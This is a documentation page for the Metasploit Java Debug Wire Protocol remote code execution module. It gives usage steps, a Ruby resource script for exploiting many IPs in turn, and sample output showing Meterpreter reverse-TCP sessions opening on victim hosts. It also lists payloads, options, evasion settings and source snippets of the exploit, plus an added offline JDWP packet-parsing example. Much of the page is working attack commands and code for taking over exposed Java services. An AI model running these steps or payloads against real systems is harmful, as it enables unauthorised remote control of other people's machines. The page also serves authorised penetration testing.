Java Debug Wire Protocol Remote Code Execution - Metasploit
This page contains detailed information about how to use the exploit/multi/misc/java_jdwp_debugger Metasploit module. For a list of all Metasploit modules, visit the Metasploit Module Library.
Module Overview
Name: Java Debug Wire Protocol Remote Code Execution
Module: exploit/multi/misc/java_jdwp_debugger
Source code: modules/exploits/multi/misc/java_jdwp_debugger.rb
Disclosure date: 2010-03-12
Last modification time: 2018-09-15 18:54:45 +0000
Supported architecture(s): armle, aarch64, x86, x64
Supported platform(s): Linux, OSX, Windows
Target service / protocol: -
Target network port(s): 8000
List of CVEs: -
This module abuses exposed Java Debug Wire Protocol services in order to execute arbitrary Java code remotely. It just abuses the protocol features, since no authentication is required if the service is enabled.
Module Ranking and Traits
Module Ranking:
- good: The exploit has a default target and it is the "common case" for this type of software (English, Windows 7 for a desktop app, 2012 for server, etc). More information about ranking can be found here.
Basic Usage
Using java_jdwp_debugger against a single host
Normally, you can use exploit/multi/misc/java_jdwp_debugger this way:
msf > use exploit/multi/misc/java_jdwp_debugger
msf exploit(java_jdwp_debugger) > show targets
... a list of targets ...
msf exploit(java_jdwp_debugger) > set TARGET target-id
msf exploit(java_jdwp_debugger) > show options
... show and set options ...
msf exploit(java_jdwp_debugger) > exploit
Using java_jdwp_debugger against multiple hosts
This is a remote exploit module, which means you can also run it against multiple hosts.
First, create a list of IPs you wish to exploit with this module. One IP per line.
Second, set up a background payload listener. This payload should be the same as the one your java_jdwp_debugger will be using:
- Do:
use exploit/multi/handler
- Do:
set PAYLOAD [payload]
- Set other options required by the payload
- Do:
set EXITONSESSION false
- Do:
run -j
At this point, you should have a payload listening.
Next, create the following resource script. Note that you will probably need to modify the ip_list path and the payload options accordingly:
<ruby>
#
# Modify the path if necessary
#
ip_list = '/tmp/ip_list.txt'
File.foreach(ip_list) do |line|
ip = line.strip
next if ip.empty? # skip blank lines in the list
print_status("Trying against #{ip}")
run_single("use exploit/multi/misc/java_jdwp_debugger")
run_single("set RHOST #{ip}")
run_single("set DisablePayloadHandler true")
#
# Set a payload that's the same as the handler.
# You might also need to add more run_single commands to configure other
# payload options.
#
run_single("set PAYLOAD [payload name]")
run_single("run")
end
</ruby>
Next, run the resource script in the console:
msf > resource [path-to-resource-script]
Finally, you should see the exploit being run against those hosts, similar to the following MS08-067 example:
msf > resource /tmp/exploit_hosts.rc
[*] Processing /tmp/exploit_hosts.rc for ERB directives.
[*] resource (/tmp/exploit_hosts.rc)> Ruby Code (402 bytes)
[*] Trying against 192.168.1.80
RHOST => 192.168.1.80
DisablePayloadHandler => true
PAYLOAD => windows/meterpreter/reverse_tcp
LHOST => 192.168.1.199
[*] 192.168.1.80:445 - Automatically detecting the target...
[*] 192.168.1.80:445 - Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] 192.168.1.80:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] 192.168.1.80:445 - Attempting to trigger the vulnerability...
[*] Sending stage (957999 bytes) to 192.168.1.80
[*] Trying against 192.168.1.109
RHOST => 192.168.1.109
DisablePayloadHandler => true
PAYLOAD => windows/meterpreter/reverse_tcp
LHOST => 192.168.1.199
[*] 192.168.1.109:445 - Automatically detecting the target...
[*] 192.168.1.109:445 - Fingerprint: Windows 2003 - Service Pack 2 - lang:Unknown
[*] 192.168.1.109:445 - We could not detect the language pack, defaulting to English
[*] 192.168.1.109:445 - Selected Target: Windows 2003 SP2 English (NX)
[*] 192.168.1.109:445 - Attempting to trigger the vulnerability...
[*] Meterpreter session 1 opened (192.168.1.199:4444 -> 192.168.1.80:1071) at 2016-03-02 19:32:49 -0600
[*] Sending stage (957999 bytes) to 192.168.1.109
[*] Meterpreter session 2 opened (192.168.1.199:4444 -> 192.168.1.109:4626) at 2016-03-02 19:32:52 -0600
Required Options
- RHOSTS: The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
Msfconsole Usage
Here is how the multi/misc/java_jdwp_debugger exploit module looks in the msfconsole:
msf6 > use exploit/multi/misc/java_jdwp_debugger
[*] No payload configured, defaulting to linux/aarch64/meterpreter/reverse_tcp
msf6 exploit(multi/misc/java_jdwp_debugger) > show info
Name: Java Debug Wire Protocol Remote Code Execution
Module: exploit/multi/misc/java_jdwp_debugger
Platform: Linux, OSX, Windows
Arch: armle, aarch64, x86, x64
Privileged: No
License: Metasploit Framework License (BSD)
Rank: Good
Disclosed: 2010-03-12
Provided by:
Michael Schierl
Christophe Alladoum
Redsadic
Available targets:
Id Name
-- ----
0 Linux (Native Payload)
1 OSX (Native Payload)
2 Windows (Native Payload)
Check supported:
Yes
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
RESPONSE_TIMEOUT 10 yes Number of seconds to wait for a server response
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 8000 yes The target port (TCP)
TMP_PATH no A directory where we can write files. Ensure there is a trailing slash
Payload information:
Space: 10000000
Avoid: 0 characters
Description:
This module abuses exposed Java Debug Wire Protocol services in
order to execute arbitrary Java code remotely. It just abuses the
protocol features, since no authentication is required if the
service is enabled.
References:
OSVDB (96066)
https://www.exploit-db.com/exploits/27179
http://docs.oracle.com/javase/1.5.0/docs/guide/jpda/jdwp-spec.html
https://seclists.org/nmap-dev/2010/q1/867
https://github.com/schierlm/JavaPayload/blob/master/JavaPayload/src/javapayload/builder/JDWPInjector.java
https://svn.nmap.org/nmap/scripts/jdwp-exec.nse
http://blog.ioactive.com/2014/04/hacking-java-debug-wire-protocol-or-how.html
Module Options
This is a complete list of options available in the multi/misc/java_jdwp_debugger exploit:
msf6 exploit(multi/misc/java_jdwp_debugger) > show options
Module options (exploit/multi/misc/java_jdwp_debugger):
Name Current Setting Required Description
---- --------------- -------- -----------
RESPONSE_TIMEOUT 10 yes Number of seconds to wait for a server response
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 8000 yes The target port (TCP)
TMP_PATH no A directory where we can write files. Ensure there is a trailing slash
Payload options (linux/aarch64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.204.3 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Linux (Native Payload)
Advanced Options
Here is a complete list of advanced options supported by the multi/misc/java_jdwp_debugger exploit:
msf6 exploit(multi/misc/java_jdwp_debugger) > show advanced
Module advanced options (exploit/multi/misc/java_jdwp_debugger):
Name Current Setting Required Description
---- --------------- -------- -----------
CHOST no The local client address
CPORT no The local client port
ConnectTimeout 10 yes Maximum number of seconds to establish a TCP connection
ContextInformationFile no The information file that contains context information
DisablePayloadHandler false no Disable the handler code for the selected payload
EXE::Custom no Use custom exe instead of automatically generating a payload exe
EXE::EICAR false no Generate an EICAR file instead of regular payload exe
EXE::FallBack false no Use the default template in case the specified one is missing
EXE::Inject false no Set to preserve the original EXE function
EXE::OldMethod false no Set to use the substitution EXE generation method.
EXE::Path no The directory in which to look for the executable template
EXE::Template no The executable template file name.
EnableContextEncoding false no Use transient context when encoding payloads
FileDropperDelay no Delay in seconds before attempting cleanup
MSI::Custom no Use custom msi instead of automatically generating a payload msi
MSI::EICAR false no Generate an EICAR file instead of regular payload msi
MSI::Path no The directory in which to look for the msi template
MSI::Template no The msi template file name
MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted)
NUM_RETRIES 10 yes Number of retries when waiting for event
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
SSL false no Negotiate SSL/TLS for outgoing connections
SSLCipher no String for SSL cipher - "DHE-RSA-AES256-SHA" or "ADH"
SSLVerifyMode PEER no SSL verification method (Accepted: CLIENT_ONCE, FAIL_IF_NO_PEER_CERT, NONE, PEER)
SSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2)
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
WfsDelay 2 no Additional delay in seconds to wait for a session
Payload advanced options (linux/aarch64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
AutoLoadStdapi true yes Automatically load the Stdapi extension
AutoRunScript no A script to run automatically on session creation.
AutoSystemInfo true yes Automatically capture system information on initialization.
AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process
AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds
EnableStageEncoding false no Encode the second stage payload
EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal
HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
PayloadProcessCommandLine no The displayed command line that will be used by the payload
PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking)
PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID
PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic)
PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs
PingbackRetries 0 yes How many additional successful pingbacks
PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks
ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
ReverseListenerBindAddress no The specific IP address to bind to on the local system
ReverseListenerBindPort no The port to bind to on the local system if different from LPORT
ReverseListenerComm no The specific communication channel to use for this listener
ReverseListenerThreaded false yes Handle every connection in a new thread (experimental)
SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed
SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down
SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure
SessionRetryWait 10 no Number of seconds to wait between reconnect attempts
StageEncoder no Encoder to use if EnableStageEncoding is set
StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set
StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible
StagerRetryCount 10 no The number of times the stager should retry if the first connect fails
StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
Exploit Targets
Here is a list of targets (platforms and systems) which the multi/misc/java_jdwp_debugger module can exploit:
msf6 exploit(multi/misc/java_jdwp_debugger) > show targets
Exploit targets:
Id Name
-- ----
0 Linux (Native Payload)
1 OSX (Native Payload)
2 Windows (Native Payload)
Compatible Payloads
This is a list of possible payloads which can be delivered and executed on the target system using the multi/misc/java_jdwp_debugger exploit:
msf6 exploit(multi/misc/java_jdwp_debugger) > show payloads
Compatible Payloads
===================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 payload/generic/custom normal No Custom Payload
1 payload/generic/debug_trap normal No Generic x86 Debug Trap
2 payload/generic/shell_bind_tcp normal No Generic Command Shell, Bind TCP Inline
3 payload/generic/shell_reverse_tcp normal No Generic Command Shell, Reverse TCP Inline
4 payload/generic/tight_loop normal No Generic x86 Tight Loop
5 payload/linux/aarch64/meterpreter/reverse_tcp normal No Linux Meterpreter, Reverse TCP Stager
6 payload/linux/aarch64/meterpreter_reverse_http normal No Linux Meterpreter, Reverse HTTP Inline
7 payload/linux/aarch64/meterpreter_reverse_https normal No Linux Meterpreter, Reverse HTTPS Inline
8 payload/linux/aarch64/meterpreter_reverse_tcp normal No Linux Meterpreter, Reverse TCP Inline
9 payload/linux/aarch64/shell/reverse_tcp normal No Linux dup2 Command Shell, Reverse TCP Stager
10 payload/linux/aarch64/shell_reverse_tcp normal No Linux Command Shell, Reverse TCP Inline
11 payload/linux/armle/exec normal No Linux Execute Command
12 payload/linux/armle/meterpreter/bind_tcp normal No Linux Meterpreter, Bind TCP Stager
13 payload/linux/armle/meterpreter/reverse_tcp normal No Linux Meterpreter, Reverse TCP Stager
14 payload/linux/armle/meterpreter_reverse_http normal No Linux Meterpreter, Reverse HTTP Inline
15 payload/linux/armle/meterpreter_reverse_https normal No Linux Meterpreter, Reverse HTTPS Inline
16 payload/linux/armle/meterpreter_reverse_tcp normal No Linux Meterpreter, Reverse TCP Inline
17 payload/linux/armle/shell/bind_tcp normal No Linux dup2 Command Shell, Bind TCP Stager
18 payload/linux/armle/shell/reverse_tcp normal No Linux dup2 Command Shell, Reverse TCP Stager
19 payload/linux/armle/shell_bind_tcp normal No Linux Command Shell, Reverse TCP Inline
20 payload/linux/armle/shell_reverse_tcp normal No Linux Command Shell, Reverse TCP Inline
21 payload/linux/x64/exec normal No Linux Execute Command
22 payload/linux/x64/meterpreter/bind_tcp normal No Linux Mettle x64, Bind TCP Stager
23 payload/linux/x64/meterpreter/reverse_tcp normal No Linux Mettle x64, Reverse TCP Stager
24 payload/linux/x64/meterpreter_reverse_http normal No Linux Meterpreter, Reverse HTTP Inline
25 payload/linux/x64/meterpreter_reverse_https normal No Linux Meterpreter, Reverse HTTPS Inline
26 payload/linux/x64/meterpreter_reverse_tcp normal No Linux Meterpreter, Reverse TCP Inline
27 payload/linux/x64/shell/bind_tcp normal No Linux Command Shell, Bind TCP Stager
28 payload/linux/x64/shell/reverse_tcp normal No Linux Command Shell, Reverse TCP Stager
29 payload/linux/x64/shell_bind_ipv6_tcp normal No Linux x64 Command Shell, Bind TCP Inline (IPv6)
30 payload/linux/x64/shell_bind_tcp normal No Linux Command Shell, Bind TCP Inline
31 payload/linux/x64/shell_bind_tcp_random_port normal No Linux Command Shell, Bind TCP Random Port Inline
32 payload/linux/x64/shell_reverse_ipv6_tcp normal No Linux x64 Command Shell, Reverse TCP Inline (IPv6)
33 payload/linux/x64/shell_reverse_tcp normal No Linux Command Shell, Reverse TCP Inline
34 payload/linux/x86/chmod normal No Linux Chmod
35 payload/linux/x86/exec normal No Linux Execute Command
36 payload/linux/x86/meterpreter/bind_ipv6_tcp normal No Linux Mettle x86, Bind IPv6 TCP Stager (Linux x86)
37 payload/linux/x86/meterpreter/bind_ipv6_tcp_uuid normal No Linux Mettle x86, Bind IPv6 TCP Stager with UUID Support (Linux x86)
38 payload/linux/x86/meterpreter/bind_nonx_tcp normal No Linux Mettle x86, Bind TCP Stager
39 payload/linux/x86/meterpreter/bind_tcp normal No Linux Mettle x86, Bind TCP Stager (Linux x86)
40 payload/linux/x86/meterpreter/bind_tcp_uuid normal No Linux Mettle x86, Bind TCP Stager with UUID Support (Linux x86)
41 payload/linux/x86/meterpreter/reverse_ipv6_tcp normal No Linux Mettle x86, Reverse TCP Stager (IPv6)
42 payload/linux/x86/meterpreter/reverse_nonx_tcp normal No Linux Mettle x86, Reverse TCP Stager
43 payload/linux/x86/meterpreter/reverse_tcp normal No Linux Mettle x86, Reverse TCP Stager
44 payload/linux/x86/meterpreter/reverse_tcp_uuid normal No Linux Mettle x86, Reverse TCP Stager
45 payload/linux/x86/meterpreter_reverse_http normal No Linux Meterpreter, Reverse HTTP Inline
46 payload/linux/x86/meterpreter_reverse_https normal No Linux Meterpreter, Reverse HTTPS Inline
47 payload/linux/x86/meterpreter_reverse_tcp normal No Linux Meterpreter, Reverse TCP Inline
48 payload/linux/x86/metsvc_bind_tcp normal No Linux Meterpreter Service, Bind TCP
49 payload/linux/x86/metsvc_reverse_tcp normal No Linux Meterpreter Service, Reverse TCP Inline
50 payload/linux/x86/read_file normal No Linux Read File
51 payload/linux/x86/shell/bind_ipv6_tcp normal No Linux Command Shell, Bind IPv6 TCP Stager (Linux x86)
52 payload/linux/x86/shell/bind_ipv6_tcp_uuid normal No Linux Command Shell, Bind IPv6 TCP Stager with UUID Support (Linux x86)
53 payload/linux/x86/shell/bind_nonx_tcp normal No Linux Command Shell, Bind TCP Stager
54 payload/linux/x86/shell/bind_tcp normal No Linux Command Shell, Bind TCP Stager (Linux x86)
55 payload/linux/x86/shell/bind_tcp_uuid normal No Linux Command Shell, Bind TCP Stager with UUID Support (Linux x86)
56 payload/linux/x86/shell/reverse_ipv6_tcp normal No Linux Command Shell, Reverse TCP Stager (IPv6)
57 payload/linux/x86/shell/reverse_nonx_tcp normal No Linux Command Shell, Reverse TCP Stager
58 payload/linux/x86/shell/reverse_tcp normal No Linux Command Shell, Reverse TCP Stager
59 payload/linux/x86/shell/reverse_tcp_uuid normal No Linux Command Shell, Reverse TCP Stager
60 payload/linux/x86/shell_bind_ipv6_tcp normal No Linux Command Shell, Bind TCP Inline (IPv6)
61 payload/linux/x86/shell_bind_tcp normal No Linux Command Shell, Bind TCP Inline
62 payload/linux/x86/shell_bind_tcp_random_port normal No Linux Command Shell, Bind TCP Random Port Inline
63 payload/linux/x86/shell_reverse_tcp normal No Linux Command Shell, Reverse TCP Inline
64 payload/linux/x86/shell_reverse_tcp_ipv6 normal No Linux Command Shell, Reverse TCP Inline (IPv6)
Evasion Options
Here is the full list of possible evasion options supported by the multi/misc/java_jdwp_debugger exploit in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):
msf6 exploit(multi/misc/java_jdwp_debugger) > show evasion
Module evasion options:
Name Current Setting Required Description
---- --------------- -------- -----------
TCP::max_send_size 0 no Maxiumum tcp segment size. (0 = disable)
TCP::send_delay 0 no Delays inserted before every send. (0 = disable)
Error Messages
This module may fail with the following error messages:
- <PEER> - Not received response length
- <PEER> - Received corrupted response
- <PEER> - Server sent error with code <ERR_CODE>
- <PEER> - Not received response
- <PEER> - Received corrupted response
- Unknown format
- Unknown format
- Unexpected data when parsing server response
- Bad response when getting value for field
- Class "<LOOKED_CLASS>" not found
- Method "<LOOKED_METHOD>" not found
- Bad defined break class
- No network response
- No network response
- No network response
- <PEER> - No network response
- target_class is nil
- type_id is nil
- You need to add a trailing slash/backslash to TMP_PATH
- <OS> system detected but using <PLATFORM> target...
- Failed to allocate string for payload dumping
- Unexpected returned type: expected String
- Failed to allocate string for filename
- Unexpected returned type: expected Object
- Failed to create file. Try to change the TMP_PATH
- Unexpected returned type: expected Array
- Failed to create byte array to store payload
- Exception while writing to file
- Exception while closing file
- Failed to allocate string for payload dumping
- Unexpected returned type: expected Object
- Failed to invoke Runtime.getRuntime()
- Cannot find method Runtime.exec()
- Unexpected returned type: expected Object
- Could not find a suitable thread for stepping
- Could not set the event
- Security attribute not found
- JDWP Protocol not found
- Received <VALUE> responses that are not a 'step into' event...
- Event not received in <NUM_RETRIES> attempts
Check for the possible causes in the code snippets below, taken from the module source code. This can often help in identifying the root cause of the problem.
<PEER> - Not received response length
Here is a relevant code snippet related to the "<PEER> - Not received response length" error message:
161: end
162:
163: # Reads packet response for JDWP protocol
164: def read_reply(timeout = default_timeout)
165: length = sock.get_once(4, timeout)
166: fail_with(Failure::TimeoutExpired, "#{peer} - Not received response length") unless length
167: pkt_len = length.unpack('N')[0]
168: if pkt_len < 4
169: fail_with(Failure::Unknown, "#{peer} - Received corrupted response")
170: end
171: id, flags, err_code = sock.get_once(7, timeout).unpack('NCn')
<PEER> - Received corrupted response
Here is a relevant code snippet related to the "<PEER> - Received corrupted response" error message:
164: def read_reply(timeout = default_timeout)
165: length = sock.get_once(4, timeout)
166: fail_with(Failure::TimeoutExpired, "#{peer} - Not received response length") unless length
167: pkt_len = length.unpack('N')[0]
168: if pkt_len < 4
169: fail_with(Failure::Unknown, "#{peer} - Received corrupted response")
170: end
171: id, flags, err_code = sock.get_once(7, timeout).unpack('NCn')
172: if err_code != 0 && flags == REPLY_PACKET_TYPE
173: fail_with(Failure::Unknown, "#{peer} - Server sent error with code #{err_code}")
174: end
<PEER> - Server sent error with code <ERR_CODE>
Here is a relevant code snippet related to the "<PEER> - Server sent error with code <ERR_CODE>" error message:
168: if pkt_len < 4
169: fail_with(Failure::Unknown, "#{peer} - Received corrupted response")
170: end
171: id, flags, err_code = sock.get_once(7, timeout).unpack('NCn')
172: if err_code != 0 && flags == REPLY_PACKET_TYPE
173: fail_with(Failure::Unknown, "#{peer} - Server sent error with code #{err_code}")
174: end
175:
176: response = ""
177: while response.length + 11 < pkt_len
178: partial = sock.get_once(pkt_len, timeout)
<PEER> - Not received response
Here is a relevant code snippet related to the "<PEER> - Not received response" error message:
174: end
175:
176: response = ""
177: while response.length + 11 < pkt_len
178: partial = sock.get_once(pkt_len, timeout)
179: fail_with(Failure::TimeoutExpired, "#{peer} - Not received response") unless partial
180: response << partial
181: end
182: fail_with(Failure::Unknown, "#{peer} - Received corrupted response") unless response.length + 11 == pkt_len
183: response
184: end
<PEER> - Received corrupted response
Here is a relevant code snippet related to the "<PEER> - Received corrupted response" error message:
177: while response.length + 11 < pkt_len
178: partial = sock.get_once(pkt_len, timeout)
179: fail_with(Failure::TimeoutExpired, "#{peer} - Not received response") unless partial
180: response << partial
181: end
182: fail_with(Failure::Unknown, "#{peer} - Received corrupted response") unless response.length + 11 == pkt_len
183: response
184: end
185:
186: # Returns the characters contained in the string defined in target VM
187: def solve_string(data)
Unknown format
Here is a relevant code snippet related to the "Unknown format" error message:
219: return [value].pack('Q>')
220: elsif fmt == "I" || fmt == 4
221: return [value].pack('N')
222: end
223:
224: fail_with(Failure::Unknown, "Unknown format")
225: end
226:
227: # Unpack Integer from JDWP protocol
228: def unformat(fmt, value)
229: if fmt == "L" || fmt == 8
Unknown format
Here is a relevant code snippet related to the "Unknown format" error message:
230: return value[0..7].unpack('Q>')[0]
231: elsif fmt == "I" || fmt == 4
232: return value[0..3].unpack('N')[0]
233: end
234:
235: fail_with(Failure::Unknown, "Unknown format")
236: end
237:
238: # Parses given data according to a set of formats
239: def parse_entries(buf, formats, explicit=true)
240: entries = []
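As an added example that is not the module's own code, the checks made by read_reply and by the format/unformat helpers above are rewritten as a stand-alone Ruby parser over an in-memory byte buffer, so you can see which malformed input produces each of the "Not received response length", "Received corrupted response", "Not received response" and "Server sent error with code" messages without touching a socket. The reply header layout (length, id, flags, error code) and the five-field VirtualMachine.IDSizes reply follow the JDWP specification linked in the references; the helper names and the sample packets are my own.

```ruby
# Added example, not the module's own code: JDWP reply-packet parsing over an
# in-memory byte buffer, mirroring the checks in read_reply/format/unformat.
# Header layout per the JDWP spec: length(4) id(4) flags(1) error_code(2).

REPLY_PACKET_TYPE = 0x80   # flags value marking a reply (vs. a command) packet
HEADER_LEN = 11            # bytes of header preceding the reply data

class JdwpError < StandardError; end

# Parses one reply packet. Raises JdwpError with the same wording the module
# uses, so a failure can be mapped back to the module's error messages.
def parse_jdwp_reply(buf)
  raise JdwpError, 'Not received response length' if buf.nil? || buf.bytesize < 4
  pkt_len = buf.unpack1('N')
  # The module rejects pkt_len < 4 up front and later fails unless the body
  # plus the 11-byte header adds up to pkt_len; one check covers both here.
  raise JdwpError, 'Received corrupted response' if pkt_len < HEADER_LEN
  raise JdwpError, 'Not received response' if buf.bytesize < pkt_len
  id, flags, err_code = buf.byteslice(4, 7).unpack('NCn')
  if err_code != 0 && flags == REPLY_PACKET_TYPE
    raise JdwpError, "Server sent error with code #{err_code}"
  end
  { id: id, flags: flags, err_code: err_code,
    data: buf.byteslice(HEADER_LEN, pkt_len - HEADER_LEN) }
end

# Packs an integer id using the id size the target VM reported (8 or 4 bytes).
def format_id(fmt, value)
  return [value].pack('Q>') if fmt == 'L' || fmt == 8
  return [value].pack('N')  if fmt == 'I' || fmt == 4
  raise JdwpError, 'Unknown format'
end

# Unpacks an id of the given size from the front of a buffer.
def unformat_id(fmt, value)
  return value.byteslice(0, 8).unpack1('Q>') if fmt == 'L' || fmt == 8
  return value.byteslice(0, 4).unpack1('N')  if fmt == 'I' || fmt == 4
  raise JdwpError, 'Unknown format'
end

# VirtualMachine.IDSizes reply data: five 4-byte big-endian sizes, in this
# order (the module stores objectid_size and referencetypeid_size in @vars).
def parse_id_sizes(data)
  raise JdwpError, 'Unexpected data when parsing server response' unless data.bytesize == 20
  keys = %w[fieldid_size methodid_size objectid_size referencetypeid_size frameid_size]
  keys.zip(data.unpack('N5')).to_h
end

# Builds a reply packet from its parts (constructed sample data, not captured traffic).
def build_jdwp_reply(id, err_code, data)
  [HEADER_LEN + data.bytesize, id, REPLY_PACKET_TYPE, err_code].pack('NNCn') + data
end

if __FILE__ == $PROGRAM_NAME
  pkt = build_jdwp_reply(1, 0, [8, 8, 8, 8, 8].pack('N5'))
  sizes = parse_id_sizes(parse_jdwp_reply(pkt)[:data])
  puts "object ids are #{sizes['objectid_size']} bytes"
end
```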
Unexpected data when parsing server response
Here is a relevant code snippet related to the "Unexpected data when parsing server response" error message:
276: index += 9
277: elsif t == 73
278: data[name], buf = buf[index +1, 4].unpack('NN')
279: end
280: else
281: fail_with(Failure::UnexpectedReply, "Unexpected data when parsing server response")
282: end
283:
284: end
285: entries.append(data)
286: end
Bad response when getting value for field
Here is a relevant code snippet related to the "Bad response when getting value for field" error message:
411: sock.put(create_packet(GETVALUES_SIG, data))
412: response = read_reply
413: num_values = response.unpack('N')[0]
414:
415: unless (num_values == 1) && (response[4].unpack('C')[0] == TAG_OBJECT)
416: fail_with(Failure::Unknown, "Bad response when getting value for field")
417: end
418:
419: len = @vars["objectid_size"]
420: value = unformat(len, response[5..-1])
421:
Class "<LOOKED_CLASS>" not found
Here is a relevant code snippet related to the "Class "<LOOKED_CLASS>" not found" error message:
455:
456: # Checks if specified class and method are currently loaded by the target VM and returns them
457: def get_class_and_method(looked_class, looked_method, signature = nil)
458: target_class = get_class_by_name(looked_class)
459: unless target_class
460: fail_with(Failure::Unknown, "Class \"#{looked_class}\" not found")
461: end
462:
463: get_methods(target_class["reftype_id"])
464: target_method = get_method_by_name(target_class["reftype_id"], looked_method, signature)
465: unless target_method
Method "<LOOKED_METHOD>" not found
Here is a relevant code snippet related to the "Method "<LOOKED_METHOD>" not found" error message:
461: end
462:
463: get_methods(target_class["reftype_id"])
464: target_method = get_method_by_name(target_class["reftype_id"], looked_method, signature)
465: unless target_method
466: fail_with(Failure::Unknown, "Method \"#{looked_method}\" not found")
467: end
468:
469: return target_class, target_method
470: end
471:
Bad defined break class
Here is a relevant code snippet related to the "Bad defined break class" error message:
471:
472: # Transforms a string containing class and method (i.e. from "java.net.ServerSocket.accept" to "Ljava/net/ServerSocket;" and "accept")
473: def str_to_fq_class(s)
474: i = s.rindex(".")
475: unless i
476: fail_with(Failure::BadConfig, 'Bad defined break class')
477: end
478:
479: method = s[i+1..-1] # Substring of s, from the last '.' to the end of the string
480:
481: classname = 'L'
No network response
Here is a relevant code snippet related to the "No network response" error message:
488: # Gets the status of a given thread
489: def thread_status(thread_id)
490: sock.put(create_packet(THREADSTATUS_SIG, format(@vars["objectid_size"], thread_id)))
491: buf = read_reply(datastore['BREAK_TIMEOUT'])
492: unless buf
493: fail_with(Failure::Unknown, "No network response")
494: end
495: status, suspend_status = buf.unpack('NN')
496:
497: status
498: end
No network response
Here is a relevant code snippet related to the "No network response" error message:
505: sock.put(create_packet(THREADRESUME_SIG, format(@vars["objectid_size"], thread_id)))
506: end
507:
508: response = read_reply(datastore['BREAK_TIMEOUT'])
509: unless response
510: fail_with(Failure::Unknown, "No network response")
511: end
512:
513: response
514: end
515:
No network response
Here is a relevant code snippet related to the "No network response" error message:
521: sock.put(create_packet(THREADSUSPEND_SIG, format(@vars["objectid_size"], thread_id)))
522: end
523:
524: response = read_reply
525: unless response
526: fail_with(Failure::Unknown, "No network response")
527: end
528:
529: response
530: end
531:
<PEER> - No network response
Here is a relevant code snippet related to the "<PEER> - No network response" error message:
541: end
542:
543: sock.put(create_packet(EVENTSET_SIG, data))
544: response = read_reply
545: unless response
546: fail_with(Failure::Unknown, "#{peer} - No network response")
547: end
548: return response.unpack('N')[0]
549: end
550:
551: # Parses a received event and compares it with the expected
target_class is nil
Here is a relevant code snippet related to the "target_class is nil" error message:
625: end
626:
627: # Creates a byte[]
628: def create_array(len)
629: target_class = get_class_by_name("[B")
630: fail_with(Failure::Unknown, "target_class is nil") if target_class.nil?
631:
632: type_id = target_class["reftype_id"]
633: fail_with(Failure::Unknown, "type_id is nil") if type_id.nil?
634:
635: data = format(@vars["referencetypeid_size"], type_id)
type_id is nil
Here is a relevant code snippet related to the "type_id is nil" error message:
628: def create_array(len)
629: target_class = get_class_by_name("[B")
630: fail_with(Failure::Unknown, "target_class is nil") if target_class.nil?
631:
632: type_id = target_class["reftype_id"]
633: fail_with(Failure::Unknown, "type_id is nil") if type_id.nil?
634:
635: data = format(@vars["referencetypeid_size"], type_id)
636: data << [len].pack('N')
637:
638: sock.put(create_packet(ARRAYNEWINSTANCE_SIG, data))
You need to add a trailing slash/backslash to TMP_PATH
Here is a relevant code snippet related to the "You need to add a trailing slash/backslash to TMP_PATH" error message:
655: end
656:
657: def temp_path
658: return nil unless datastore['TMP_PATH']
659: unless datastore['TMP_PATH'].end_with?('/') || datastore['TMP_PATH'].end_with?('\\')
660: fail_with(Failure::BadConfig, 'You need to add a trailing slash/backslash to TMP_PATH')
661: end
662: datastore['TMP_PATH']
663: end
664:
665: # Configures payload according to targeted architecture
<OS> system detected but using <PLATFORM> target...
Here is a relevant code snippet related to the "<OS> system detected but using <PLATFORM> target..." error message:
680: path = temp_path || './'
681: payload_exe = "#{path}#{payload_exe}.exe"
682: end
683:
684: if @os.downcase =~ /target['Platform']/
685: print_warning("#{@os} system detected but using #{target['Platform']} target...")
686: end
687:
688: return payload_exe, pl_exe
689: end
690:
Failed to allocate string for payload dumping
Here is a relevant code snippet related to the "Failed to allocate string for payload dumping" error message:
692: def fingerprint_os(thread_id)
693: size = @vars["objectid_size"]
694:
695: # 1. Creates a string on target VM with the property to be getted
696: cmd_obj_ids = create_string("os.name")
697: fail_with(Failure::Unknown, "Failed to allocate string for payload dumping") if cmd_obj_ids.length == 0
698: cmd_obj_id = cmd_obj_ids[0]["obj_id"]
699:
700: # 2. Gets property
701: data = [TAG_OBJECT].pack('C')
702: data << format(size, cmd_obj_id)
Unexpected returned type: expected String
Here is a relevant code snippet related to the "Unexpected returned type: expected String" error message:
